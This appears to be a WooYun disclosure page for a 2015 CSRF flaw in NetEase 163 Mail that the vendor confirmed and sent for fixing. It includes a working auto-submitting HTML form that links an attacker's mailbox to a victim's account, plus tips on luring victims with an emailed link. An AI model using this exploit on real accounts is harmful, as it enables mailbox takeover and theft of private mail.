当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147846

漏洞标题:网易某处点开我的链接就会被盗号

相关厂商:网易

漏洞作者: 子非海绵宝宝

提交时间:2015-10-19 18:18

修复时间:2015-12-07 15:10

公开时间:2015-12-07 15:10

漏洞类型:CSRF

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-19: 细节已通知厂商并且等待厂商处理中
2015-10-23: 厂商已经确认,细节仅向厂商公开
2015-11-02: 细节向核心白帽子及相关领域专家公开
2015-11-12: 细节向普通白帽子公开
2015-11-22: 细节向实习白帽子公开
2015-12-07: 细节向公众公开

简要描述:

RT

详细说明:

网易对接口管理不是很到位
没什么好说的CSRF而已
直接看利用代码

<form action="https://ssl.mail.163.com/config.mail.163.com/multiAccount/service/relateAccount.do" method="post"> 
<input type="text" name="relUsername" value="自己的邮箱@163.com" />
<input type="text" name="relPassword" value="自己的密码" />
<input type="text" name="inmail" value="false" />
<input type="text" name="from" value="urspage" />
<input type="text" name="callback" value="parent.relateCallback" />
<input type="text" name="retype" value="1" />
<script> document.forms[0].submit(); </script>
</form>


把此表单插入任意页面中
只要邮箱处在登入状态即可关联帐号
关联的帐号就可以登录目标用户的邮箱 简单易操作 点开链接即可
也可以直接诶发邮箱给目标用户 里面放个链接 引诱点击即可

漏洞证明:

1.png

修复方案:

你猜

版权声明:转载请注明来源 子非海绵宝宝@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-10-23 15:09

厂商回复:

感谢您对网易的关注!漏洞已交付开发人员修复

最新状态:

暂无